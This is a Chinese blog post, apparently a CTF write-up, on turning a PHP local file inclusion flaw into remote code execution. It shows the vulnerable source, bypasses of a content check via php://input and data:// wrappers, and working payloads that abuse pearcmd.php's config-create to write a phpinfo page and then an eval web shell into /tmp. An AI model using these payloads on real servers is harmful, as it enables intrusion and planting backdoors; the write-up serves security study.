利用 pearcmd.php 实现 Getshell

最新推荐文章于 2024-01-20 15:56:22 发布
最新推荐文章于 2024-01-20 15:56:22 发布
阅读量612 收藏 2
点赞数
分类专栏: ctf Writeup 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SuichI314/article/details/122458511
版权

文章目录


学习连接: 西湖论剑的一道Web

源码

<?php
highlight_file(__FILE__);
if(isset($_GET['check'])){
    if(file_get_contents($_GET['check']) === "LFI"){
            @include($_GET['a']);
    }else{
            die("no!");
    }
}

分析

信息搜集了一圈,啥也没有,也就是说不知道flag在哪个文件夹,自然无法简单的include
先分析源码吧

file_get_contents($_GET[‘check’]) === “LFI”

这里要求 $check 文件中的内容必须为 LFI ,有两种方法:
?check=php://input,请求包中加上POST数据:LFI
?check=data://text/plain,LFI

@include($_GET[‘a’]);

可以读取任意文件

一般思路是寻找可包含文件,但刚才信息收集下来没有发现可疑文件,这个时候考虑包含系统敏感文件、php配置文件、Apache配置文件等
我尝试了一圈发现不可行

利用Pearcmd.php

简单来说就是利用这个文件中的pear命令行,其中有个可利用参数config-create,这个命令需要传入两个参数,其中第二个参数是写入的文件路径,第一个参数会被写入到这个文件中。

learn by here

构造payload:/?check=data://text/plain,LFI&+config-create+/&a=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/shell.php
访问/tmp/shell.php
在这里插入图片描述
剩下的就是常规套路
/?check=data://text/plain,LFI&+config-create+/&a=/usr/local/lib/php/pearcmd.php&/<?=eval($_REQUEST[8])?>+/tmp/shell.php
在这里插入图片描述

1ta-chi
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
通过file_get_contents()发送GET、POST请求
张默的博客
07-24 1782
get $data = array( 'name'=>'zhezhao','age'=>'23'); $query = http_build_query($data); $url = 'http://localhost/get.php';//这里一定要写完整的服务页面地址,否则php程序不会运行 $result = file_get_contents($url.'?'.$query); post <?php function get_enc_data($data, $en
Getshell最全总结.pdf
07-22
getshell最全总结
TSCTF-J 2021 [SimplePHP]
Ivyyyyyy1的博客
10-24 217
一、题目 进来看到的代码如下: <?php highlight_file(__FILE__); if ($_GET["secret"] != hash("md4", $_GET["secret"])) { die('乐<br>'); } if (!preg_match('/http/i', $_GET['file'])) { if (preg_match('/^i_am_bloodhound$/', $_GET['name']) && $..
PHP中file_get_contents的使用方法
Jack huang的专栏
03-26 7381
$data=file_get_contents("php://input"); php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 always_p......
BugkuCTF-WEB题file_get_contents
am_03的博客
08-29 5675
知识点 empty() 函数用于检查一个变量是否为空。empty() 判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于 FALSE,那么它会被认为不存在。如果变量不存在的话,empty()并不会产生警告。 extract()函数从数组里将变量导入到当前的符号表。extract函数:可以进行变量覆盖。 语法:extract(array,extract_rules,prefix) 该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组里的各元素,将在当前符号表里创建对应的一个变量。第二
浅谈文件包含之包含pearcmd.php漏洞
JCPS_Y的博客
10-26 3429
浅谈一下文件包含之包含pearcmd.php漏洞
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
ThinkPHP v5.x命令执行利用工具(可getshell
jboss漏洞getshell工具.zip
08-26
jboss漏洞getshell工具
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
最新发布
04-08
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
2019-新闻原getshell.rar
09-26
这款工具本来不打算发布的,但是我打算退出这行了,所以把工具都发出来吧,希望站长可以好好扫描自己网站漏洞,这款工具主要针对新闻源网站的漏洞,因为新闻源普遍都有这个指纹
pearcmd.php文件包含妙用
leekos的博客,分享web安全相关知识~
07-24 1210
PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.4及以后,需要我们在编译PHP的时候指定。这样我们就可以从远程服务器上下载shell到靶机上了,使用文件包含注意将路径url编码。不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在。必须传入两个参数,第一个参数传入绝对路径,第二个参数传入想要保存的文件名。运行,如果存在文件包含漏洞,就可以运行这个命令行工具。此处我们传入的第一个参数不是一个绝对路径,所以不行。这样,在文件包含下,我们就可以运行。
CTF中的pearcmd.php文件包含
qq_52988816的博客
09-27 946
还是太菜了,当初看羊城杯的这个题目时完全没有想到可以用这个方法来做,还是做题太少了啊。
利用pearcmd.php文件包含拿shell(LFI)
m0_62422842的博客
09-08 2427
最近看博客的时候遇到有师傅总结了一个新颖的文件包含思路,通过pearcmd.php来进行本地文件包含来拿shell,我感觉还挺有意思的,就花时间来学习了一下。
利用pearcmd.php本地文件包含(LFI)
Mrs_H的博客
01-08 5676
利用pearcmd.php本地文件包含(LFI) 一.前言 pearcmd这个东西很久以前就已经复现过了,但是当时没有记录下来。这些天在整理之前比赛的wp的时候突然看见了pear的LFI到getshell,就突然想起来自己应该是利用过了的。但是怎么找也找不到之前的笔记,于是就有了再复现一遍的想法。 二.正文 1.环境的准备 这里的话我使用的是docker来搭建的一个lamp,然后在这个lamp上面进行后续的漏洞复现。至于为什么这么做呢?照P神的话来说就是因为在Docker任意版本的镜像中pear都会被默认安
pearcmd.php的妙用
Sk1y的博客
12-20 3198
pearcmd.php的妙用 文章目录pearcmd.php的妙用1. register_argc_argvcli模式下WEB模式中简单的利用2. pearcmd.php的神奇使用3. register_argc_argv和pear的关系4. payload靶机可出网靶机不可出网时参考链接 1. register_argc_argv 如果环境中含有php.ini,则默认register_argc_argv=Off;如果环境中没有php.ini,则默认register_argc_argv=On 这个regis
攻防世界-file_include
m0_49025459的博客
12-18 6632
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
攻防世界web-file_include(江苏工匠杯/泰山杯原题)
yuanxu8877的博客
10-30 3523
攻防世界web-file_include(江苏工匠杯)
pearcmd文件包含漏洞
Elite的博客
01-20 1377
pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库
file_include(攻防世界)
m0_56107268的博客
11-14 6775
php转化器的学习
php ueditor getshell
07-28
最近发生了一起关于PHP UEditor的getshell事件。PHP UEditor是一个常用的富文本编辑器,用于网站的内容编辑和发布。然而,攻击者利用了其中的安全漏洞,成功地注入了恶意代码,进而控制了整个网站。 该事件引起了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1ta-chi

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值